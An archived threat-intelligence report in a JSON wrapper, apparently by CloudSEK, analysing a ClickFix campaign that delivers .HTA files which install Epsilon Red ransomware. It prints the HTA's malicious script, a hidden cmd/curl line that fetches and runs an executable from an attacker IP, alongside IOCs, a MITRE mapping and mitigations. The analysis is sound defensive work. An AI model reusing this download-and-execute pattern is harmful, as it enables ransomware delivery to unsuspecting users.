{
	"id": "d67a2727-3cda-4050-88f8-6f6c11850b50",
	"created_at": "2026-04-06T02:10:47.56717Z",
	"updated_at": "2026-04-10T13:12:25.147256Z",
	"deleted_at": null,
	"sha1_hash": "a66bcaf07e11e7e0cae543134e1964a22d060389",
	"title": "Threat Actors Lure Victims Into Downloading .HTA Files Using ClickFix To Spread Epsilon Red Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 895957,
	"plain_text": "Threat Actors Lure Victims Into Downloading .HTA Files Using\r\nClickFix To Spread Epsilon Red Ransomware\r\nBy CloudSEK TRIAD\r\nPublished: 2025-07-25 · Archived: 2026-04-06 01:34:55 UTC\r\nExecutive Summary\r\nDuring routine infrastructure hunting, CloudSEK's TRIAD uncovered a ClickFix-themed malware delivery site in active development, associated with the Epsilon Red ransomware. Unlike earlier ClickFix campaigns, which copy a malicious command to the victim's clipboard for the victim to paste and run, this variant sends the victim to a secondary page on the same site, from which an .HTA file is downloaded; when the victim opens it, the HTA's script uses ActiveX (WScript.Shell) to run shell commands that silently download and execute a payload from an attacker-controlled IP. Social-engineering touches such as a fake verification code make the activity look benign. Pivoting into related infrastructure revealed impersonation of the Discord captcha bot captcha.bot, Kick, Twitch and OnlyFans, as well as romance-themed lures. Epsilon Red was first observed in 2021; its ransom note is loosely modelled on REvil's, but the family otherwise appears distinct in its tactics and infrastructure.\r\nAnalysis\r\nDuring routine infrastructure hunting we found a ClickFix-themed malware delivery page that was still under development.\r\nIn a typical ClickFix page, clicking the verification button copies a malicious command to the victim's clipboard. Here, instead, the victim is urged to open another page on the same website, which delivers the .HTA file. The HTA's script does the following.\r\nObtaining a shell object\r\nvar shell = new ActiveXObject(\"WScript.Shell\");\r\nWScript.Shell is a Windows Script Host COM object. HTA files are executed by mshta.exe, which gives their script unrestricted ActiveX access, so this one line lets the page's JavaScript launch arbitrary programs, here cmd.exe.\r\nSilent download and execution\r\nshell.Run(\"cmd /c cd /D %userprofile% \u0026\u0026 curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe \u0026\u0026 a.exe\", 0);\r\ncd /D %userprofile%: changes to the user's profile directory (the /D switch also switches drive if needed).\r\ncurl -s -o a.exe ...: silently downloads the file from the attacker's IP and port 2269 (curl.exe ships with Windows 10 1803 and later, so nothing extra is needed on the host) and saves it as a.exe.\r\na.exe: executes the downloaded file [md5: 98107c01ecd8b7802582d404e007e493], which is the Epsilon Red ransomware.\r\n0: the second argument of Run is the window style; 0 runs the process hidden, so no console window is shown for this stage.\r\nThe three commands are chained with \u0026\u0026, so each step runs only if the previous one succeeded; a failed download does not execute a stale a.exe.\r\nDisplaying a fake verification message\r\nshell.Run(\"cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 \u0026\u0026 pause\");\r\nThis second Run call omits the window-style argument, so its console window is visible: it shows the social-engineering message that completes the ClickFix bait theme. The typo (\"Verificatification\") may be deliberate, to look harmless or amateurish.\r\npause: keeps the command window open until a key is pressed.\r\nOnce the victim enters the code shown in the command prompt, a confirmation message appears in the dialog box (shown as a screenshot in the original post).\r\nPivoting through the infrastructure, we noted that the threat actors impersonate a popular Discord captcha bot (https://captcha.bot) and a range of streaming and creator platforms such as Kick, Twitch, Rumble and OnlyFans, delivering predominantly Windows payloads via ClickFix. We also found a small cluster of romance/dating-themed ClickFix delivery pages operated by the same threat actor.\r\nAttribution\r\nEpsilon Red ransomware, first identified in 2021, leaves a ransom note on infected computers that resembles the REvil ransomware note, with minor grammatical improvements. 
Apart from the ransom-note styling, no other clear similarities between Epsilon Red and REvil ransomware have been observed.\r\nMITRE Mapping\r\nTactic | Technique | ID | Description\r\nInitial Access | Drive-by Compromise | T1189 | Victims are lured to themed websites (e.g. fake verification pages) that deliver the malicious .HTA.\r\nExecution | User Execution: Malicious Link / Malicious File | T1204.001, T1204.002 | Victims are socially engineered into following staged instructions: clicking the link to the secondary page and opening the downloaded .HTA.\r\nExecution | System Binary Proxy Execution: Mshta | T1218.005 | The .HTA is executed by mshta.exe, which grants the embedded script full ActiveX access.\r\nExecution | Command and Scripting Interpreter: JavaScript | T1059.007 | Malicious JavaScript (ActiveXObject(\"WScript.Shell\")) embedded in the HTA runs commands on the host.\r\nExecution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | cmd.exe is used to download and run the payload and to display the social-engineering message.\r\nDefense Evasion | Hide Artifacts: Hidden Window | T1564.003 | The download runs quietly (curl -s) and the process is launched hidden (Run(..., 0)), so the victim sees no window for the malicious stage.\r\nDefense Evasion | Masquerading | T1036 | Fake verification codes and benign themes (captcha verification, streaming platforms) mislead users and analysts.\r\nPersistence (expected) | Scheduled Task/Job: Scheduled Task | T1053.005 | Epsilon Red campaigns have historically used scheduled tasks for persistence after execution; not observed directly in this sample.\r\nCommand and Control | Application Layer Protocol: Web Protocols | T1071.001 | HTTP (via curl, to a non-standard port) is used for the payload download and possibly for follow-up C2 traffic.\r\nImpact | Data Encrypted for Impact | T1486 | The final-stage Epsilon Red ransomware encrypts the victim's files.\r\nIOCs\r\nType | Value | Notes\r\nmd5 | 98107c01ecd8b7802582d404e007e493 | Epsilon Red ransomware (served as vir.exe, saved as a.exe)\r\nDomain | twtich[.]cc | ClickFix delivery page, .hta variant (Twitch typosquat)\r\nIP:Port | 155.94.155[.]227:2269 | Payload host for the curl download and command and control\r\nmd5 | 2db32339fa151276d5a40781bc8d5eaa | Quasar RAT\r\nDomain | capchabot[.]cc | ClickFix delivery page, standard clipboard variant (captcha.bot impersonation)\r\nIP:Port | 213.209.150[.]188:8112 | Command and control\r\n
Impact\r\nEndpoint compromise via HTA: .HTA files are not rendered by the browser but executed by mshta.exe, so the page's JavaScript gets unrestricted ActiveX access and can launch arbitrary commands. No exploit is needed, only a victim who opens the downloaded file, which sidesteps the protections that apply to in-browser content.\r\nRansomware deployment: the chain ends in Epsilon Red, so a single click can lead to full encryption of the host, typically preceded by lateral movement in a corporate network.\r\nBrand impersonation reduces user suspicion: mimicking the Discord captcha bot and streaming platforms raises the success rate of the social engineering.\r\nPersistent infrastructure abuse: reuse of themed delivery pages (ClickFix, romance lures) across campaigns indicates long-lived operational infrastructure and planning.\r\nMitigations\r\nBlock HTA and legacy script hosts: prevent mshta.exe, wscript.exe and cscript.exe from running for standard users (AppLocker or WDAC), change the default handler for .hta files to a text editor, and disable Windows Script Host via the Enabled value under its Settings registry key where no business process depends on it. The Defender ASR rule \"Block JavaScript or VBScript from launching downloaded executable content\" addresses this download-and-execute pattern.\r\nThreat feed integration and blocking: ingest threat intel to block the attacker IPs and domains listed above, and the IOFAs (Indicators of Future Attack) tied to ClickFix campaigns, at the proxy and firewall; outbound HTTP from user workstations to non-standard ports such as 2269 and 8112 should be denied by default.\r\nEndpoint behaviour analytics: deploy EDR rules for cmd.exe spawned by mshta.exe or by a browser, for curl.exe (built into Windows since 10 1803) writing executables into a user profile, and for a newly written executable being launched within seconds of its download.\r\nSecurity awareness training: run simulations that impersonate familiar services (Discord bots, Twitch) so users learn not to interact with fake verification pages or open files they are told are a verification step.\r\nReferences\r\nhttps://news.sophos.com/en-us/2021/05/28/epsilonred/\r\nSource: https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware"
	],
	"report_names": [
		"threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775441447,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a66bcaf07e11e7e0cae543134e1964a22d060389.pdf",
		"text": "https://archive.orkl.eu/a66bcaf07e11e7e0cae543134e1964a22d060389.txt",
		"img": "https://archive.orkl.eu/a66bcaf07e11e7e0cae543134e1964a22d060389.jpg"
	}
}